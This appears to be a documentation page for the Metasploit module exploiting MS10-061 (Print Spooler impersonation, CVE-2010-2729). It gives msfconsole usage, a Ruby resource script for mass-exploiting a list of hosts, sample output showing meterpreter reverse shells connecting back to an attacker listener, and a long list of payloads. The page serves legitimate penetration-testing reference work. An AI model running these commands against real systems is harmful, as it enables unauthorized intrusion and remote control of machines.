MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/windows/smb/ms10_061_spoolss metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Source code: modules/exploits/windows/smb/ms10_061_spoolss.rb
Disclosure date: 2010-09-14
Last modification time: 2021-01-13 11:51:16 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2010-2729

This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using ms10_061_spoolss against a single host

Normally, you can use exploit/windows/smb/ms10_061_spoolss this way:

msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > show targets
    ... a list of targets ...
msf exploit(ms10_061_spoolss) > set TARGET target-id
msf exploit(ms10_061_spoolss) > show options
    ... show and set options ...
msf exploit(ms10_061_spoolss) > exploit

Using ms10_061_spoolss against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your ms10_061_spoolss will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/smb/ms10_061_spoolss")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the windows/smb/ms10_061_spoolss exploit module looks in the msfconsole:

msf6 > use exploit/windows/smb/ms10_061_spoolss

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms10_061_spoolss) > show info

       Name: MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
     Module: exploit/windows/smb/ms10_061_spoolss
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2010-09-14

Provided by:
  jduck <[email protected]>
  hdm <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Windows Universal

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PNAME                     no        The printer share name to use on the target
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  spoolss          no        The named pipe for the spooler service

Payload information:
  Space: 1024
  Avoid: 0 characters

Description:
  This module exploits the RPC service impersonation vulnerability 
  detailed in Microsoft Bulletin MS10-061. By making a specific DCE 
  RPC request to the StartDocPrinter procedure, an attacker can 
  impersonate the Printer Spooler service to create a file. The 
  working directory at the time is %SystemRoot%\system32. An attacker 
  can specify any file name, including directory traversal or full 
  paths. By sending WritePrinter requests, an attacker can fully 
  control the content of the created file. In order to gain code 
  execution, this module writes to a directory used by Windows 
  Management Instrumentation (WMI) to deploy applications. This 
  directory (Wbem\Mof) is periodically scanned and any new .mof files 
  are processed automatically. This is the same technique employed by 
  the Stuxnet code found in the wild.

References:
  OSVDB (67988)
  https://nvd.nist.gov/vuln/detail/CVE-2010-2729
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/MS10-061

Module Options


This is a complete list of options available in the windows/smb/ms10_061_spoolss exploit:

msf6 exploit(windows/smb/ms10_061_spoolss) > show options

Module options (exploit/windows/smb/ms10_061_spoolss):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PNAME                     no        The printer share name to use on the target
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  spoolss          no        The named pipe for the spooler service

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows Universal

Advanced Options


Here is a complete list of advanced options supported by the windows/smb/ms10_061_spoolss exploit:

msf6 exploit(windows/smb/ms10_061_spoolss) > show advanced

Module advanced options (exploit/windows/smb/ms10_061_spoolss):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   CHOST                                      no        The local client address
   CPORT                                      no        The local client port
   ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                     no        The information file that contains context information
   DCERPC::ReadTimeout     10                 yes       The number of seconds to wait for DCERPC responses
   DisablePayloadHandler   false              no        Disable the handler code for the selected payload
   EXE::Custom                                no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false              no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false              no        Use the default template in case the specified one is missing
   EXE::Inject             false              no        Set to preserve the original EXE function
   EXE::OldMethod          false              no        Set to use the substitution EXE generation method.
   EXE::Path                                  no        The directory in which to look for the executable template
   EXE::Template                              no        The executable template file name.
   EnableContextEncoding   false              no        Use transient context when encoding payloads
   MSI::Custom                                no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false              no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                  no        The directory in which to look for the msi template
   MSI::Template                              no        The msi template file name
   MSI::UAC                false              no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   NTLM::SendLM            true               yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM          true               yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN           true               yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
   NTLM::UseLMKey          false              yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session  true               yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2         true               yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   SMB::AlwaysEncrypt      true               yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
   SMB::ChunkSize          500                yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
   SMB::Native_LM          Windows 2000 5.0   yes       The Native LM to send during authentication
   SMB::Native_OS          Windows 2000 2195  yes       The Native OS to send during authentication
   SMB::VerifySignature    false              yes       Enforces client-side verification of server response signatures
   SMBDirect               true               no        The target port is a raw SMB service (not NetBIOS)
   SMBDomain               .                  no        The Windows domain to use for authentication
   SMBName                 *SMBSERVER         yes       The NetBIOS hostname (required for port 139 connections)
   SMBPass                                    no        The password for the specified username
   SMBUser                                    no        The username to authenticate as
   SSL                     false              no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                  no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER               no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto               yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false              no        Enable detailed status messages
   WORKSPACE                                  no        Specify the workspace for this module
   WfsDelay                2                  no        Additional delay in seconds to wait for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/smb/ms10_061_spoolss module can exploit:

msf6 exploit(windows/smb/ms10_061_spoolss) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/smb/ms10_061_spoolss exploit:

msf6 exploit(windows/smb/ms10_061_spoolss) > show payloads

Compatible Payloads
===================

   #    Name                                                        Disclosure Date  Rank    Check  Description
   -    ----                                                        ---------------  ----    -----  -----------
   0    payload/generic/custom                                                       normal  No     Custom Payload
   1    payload/generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   2    payload/generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   3    payload/generic/shell_reverse_tcp                                            normal  No     Generic Command Shell, Reverse TCP Inline
   4    payload/generic/tight_loop                                                   normal  No     Generic x86 Tight Loop
   5    payload/windows/adduser                                                      normal  No     Windows Execute net user /ADD
   6    payload/windows/dllinject/bind_hidden_ipknock_tcp                            normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   7    payload/windows/dllinject/bind_hidden_tcp                                    normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   8    payload/windows/dllinject/bind_ipv6_tcp                                      normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   9    payload/windows/dllinject/bind_ipv6_tcp_uuid                                 normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   10   payload/windows/dllinject/bind_named_pipe                                    normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   11   payload/windows/dllinject/bind_nonx_tcp                                      normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   12   payload/windows/dllinject/bind_tcp                                           normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   13   payload/windows/dllinject/bind_tcp_rc4                                       normal  No     Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   14   payload/windows/dllinject/bind_tcp_uuid                                      normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   15   payload/windows/dllinject/reverse_hop_http                                   normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   16   payload/windows/dllinject/reverse_http                                       normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   17   payload/windows/dllinject/reverse_http_proxy_pstore                          normal  No     Reflective DLL Injection, Reverse HTTP Stager Proxy
   18   payload/windows/dllinject/reverse_ipv6_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   19   payload/windows/dllinject/reverse_nonx_tcp                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   20   payload/windows/dllinject/reverse_ord_tcp                                    normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   21   payload/windows/dllinject/reverse_tcp                                        normal  No     Reflective DLL Injection, Reverse TCP Stager
   22   payload/windows/dllinject/reverse_tcp_allports                               normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   23   payload/windows/dllinject/reverse_tcp_dns                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   24   payload/windows/dllinject/reverse_tcp_rc4                                    normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   25   payload/windows/dllinject/reverse_tcp_rc4_dns                                normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   26   payload/windows/dllinject/reverse_tcp_uuid                                   normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   27   payload/windows/dllinject/reverse_winhttp                                    normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
   28   payload/windows/dns_txt_query_exec                                           normal  No     DNS TXT Record Payload Download and Execution
   29   payload/windows/download_exec                                                normal  No     Windows Executable Download (http,https,ftp) and Execute
   30   payload/windows/exec                                                         normal  No     Windows Execute Command
   31   payload/windows/format_all_drives                                            manual  No     Windows Drive Formatter
   32   payload/windows/loadlibrary                                                  normal  No     Windows LoadLibrary Path
   33   payload/windows/messagebox                                                   normal  No     Windows MessageBox
   34   payload/windows/meterpreter/bind_hidden_ipknock_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   35   payload/windows/meterpreter/bind_hidden_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   36   payload/windows/meterpreter/bind_ipv6_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   37   payload/windows/meterpreter/bind_ipv6_tcp_uuid                               normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   38   payload/windows/meterpreter/bind_named_pipe                                  normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   39   payload/windows/meterpreter/bind_nonx_tcp                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   40   payload/windows/meterpreter/bind_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   41   payload/windows/meterpreter/bind_tcp_rc4                                     normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   42   payload/windows/meterpreter/bind_tcp_uuid                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   43   payload/windows/meterpreter/reverse_hop_http                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   44   payload/windows/meterpreter/reverse_http                                     normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   45   payload/windows/meterpreter/reverse_http_proxy_pstore                        normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
   46   payload/windows/meterpreter/reverse_https                                    normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   47   payload/windows/meterpreter/reverse_https_proxy                              normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   48   payload/windows/meterpreter/reverse_ipv6_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   49   payload/windows/meterpreter/reverse_named_pipe                               normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   50   payload/windows/meterpreter/reverse_nonx_tcp                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   51   payload/windows/meterpreter/reverse_ord_tcp                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   52   payload/windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   53   payload/windows/meterpreter/reverse_tcp_allports                             normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   54   payload/windows/meterpreter/reverse_tcp_dns                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   55   payload/windows/meterpreter/reverse_tcp_rc4                                  normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   56   payload/windows/meterpreter/reverse_tcp_rc4_dns                              normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   57   payload/windows/meterpreter/reverse_tcp_uuid                                 normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   58   payload/windows/meterpreter/reverse_winhttp                                  normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   59   payload/windows/meterpreter/reverse_winhttps                                 normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
   60   payload/windows/metsvc_bind_tcp                                              normal  No     Windows Meterpreter Service, Bind TCP
   61   payload/windows/metsvc_reverse_tcp                                           normal  No     Windows Meterpreter Service, Reverse TCP Inline
   62   payload/windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  No     Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   63   payload/windows/patchupdllinject/bind_hidden_tcp                             normal  No     Windows Inject DLL, Hidden Bind TCP Stager
   64   payload/windows/patchupdllinject/bind_ipv6_tcp                               normal  No     Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   65   payload/windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  No     Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   66   payload/windows/patchupdllinject/bind_named_pipe                             normal  No     Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   67   payload/windows/patchupdllinject/bind_nonx_tcp                               normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   68   payload/windows/patchupdllinject/bind_tcp                                    normal  No     Windows Inject DLL, Bind TCP Stager (Windows x86)
   69   payload/windows/patchupdllinject/bind_tcp_rc4                                normal  No     Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   70   payload/windows/patchupdllinject/bind_tcp_uuid                               normal  No     Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   71   payload/windows/patchupdllinject/reverse_ipv6_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (IPv6)
   72   payload/windows/patchupdllinject/reverse_nonx_tcp                            normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   73   payload/windows/patchupdllinject/reverse_ord_tcp                             normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   74   payload/windows/patchupdllinject/reverse_tcp                                 normal  No     Windows Inject DLL, Reverse TCP Stager
   75   payload/windows/patchupdllinject/reverse_tcp_allports                        normal  No     Windows Inject DLL, Reverse All-Port TCP Stager
   76   payload/windows/patchupdllinject/reverse_tcp_dns                             normal  No     Windows Inject DLL, Reverse TCP Stager (DNS)
   77   payload/windows/patchupdllinject/reverse_tcp_rc4                             normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   78   payload/windows/patchupdllinject/reverse_tcp_rc4_dns                         normal  No     Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   79   payload/windows/patchupdllinject/reverse_tcp_uuid                            normal  No     Windows Inject DLL, Reverse TCP Stager with UUID Support
   80   payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   81   payload/windows/patchupmeterpreter/bind_hidden_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   82   payload/windows/patchupmeterpreter/bind_ipv6_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   83   payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  No     Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   84   payload/windows/patchupmeterpreter/bind_named_pipe                           normal  No     Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   85   payload/windows/patchupmeterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   86   payload/windows/patchupmeterpreter/bind_tcp                                  normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   87   payload/windows/patchupmeterpreter/bind_tcp_rc4                              normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   88   payload/windows/patchupmeterpreter/bind_tcp_uuid                             normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   89   payload/windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   90   payload/windows/patchupmeterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   91   payload/windows/patchupmeterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   92   payload/windows/patchupmeterpreter/reverse_tcp                               normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   93   payload/windows/patchupmeterpreter/reverse_tcp_allports                      normal  No     Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   94   payload/windows/patchupmeterpreter/reverse_tcp_dns                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   95   payload/windows/patchupmeterpreter/reverse_tcp_rc4                           normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   96   payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   97   payload/windows/patchupmeterpreter/reverse_tcp_uuid                          normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   98   payload/windows/peinject/bind_hidden_ipknock_tcp                             normal  No     Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
   99   payload/windows/peinject/bind_hidden_tcp                                     normal  No     Windows Inject PE Files, Hidden Bind TCP Stager
   100  payload/windows/peinject/bind_ipv6_tcp                                       normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
   101  payload/windows/peinject/bind_ipv6_tcp_uuid                                  normal  No     Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   102  payload/windows/peinject/bind_named_pipe                                     normal  No     Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
   103  payload/windows/peinject/bind_nonx_tcp                                       normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   104  payload/windows/peinject/bind_tcp                                            normal  No     Windows Inject PE Files, Bind TCP Stager (Windows x86)
   105  payload/windows/peinject/bind_tcp_rc4                                        normal  No     Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   106  payload/windows/peinject/bind_tcp_uuid                                       normal  No     Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
   107  payload/windows/peinject/reverse_ipv6_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (IPv6)
   108  payload/windows/peinject/reverse_named_pipe                                  normal  No     Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
   109  payload/windows/peinject/reverse_nonx_tcp                                    normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   110  payload/windows/peinject/reverse_ord_tcp                                     normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   111  payload/windows/peinject/reverse_tcp                                         normal  No     Windows Inject PE Files, Reverse TCP Stager
   112  payload/windows/peinject/reverse_tcp_allports                                normal  No     Windows Inject PE Files, Reverse All-Port TCP Stager
   113  payload/windows/peinject/reverse_tcp_dns                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (DNS)
   114  payload/windows/peinject/reverse_tcp_rc4                                     normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   115  payload/windows/peinject/reverse_tcp_rc4_dns                                 normal  No     Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   116  payload/windows/peinject/reverse_tcp_uuid                                    normal  No     Windows Inject PE Files, Reverse TCP Stager with UUID Support
   117  payload/windows/pingback_bind_tcp                                            normal  No     Windows x86 Pingback, Bind TCP Inline
   118  payload/windows/pingback_reverse_tcp                                         normal  No     Windows x86 Pingback, Reverse TCP Inline
   119  payload/windows/powershell_bind_tcp                                          normal  No     Windows Interactive Powershell Session, Bind TCP
   120  payload/windows/powershell_reverse_tcp                                       normal  No     Windows Interactive Powershell Session, Reverse TCP
   121  payload/windows/shell/bind_hidden_ipknock_tcp                                normal  No     Windows Command Shell, Hidden Bind Ipknock TCP Stager
   122  payload/windows/shell/bind_hidden_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Stager
   123  payload/windows/shell/bind_ipv6_tcp                                          normal  No     Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   124  payload/windows/shell/bind_ipv6_tcp_uuid                                     normal  No     Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   125  payload/windows/shell/bind_named_pipe                                        normal  No     Windows Command Shell, Windows x86 Bind Named Pipe Stager
   126  payload/windows/shell/bind_nonx_tcp                                          normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   127  payload/windows/shell/bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Stager (Windows x86)
   128  payload/windows/shell/bind_tcp_rc4                                           normal  No     Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
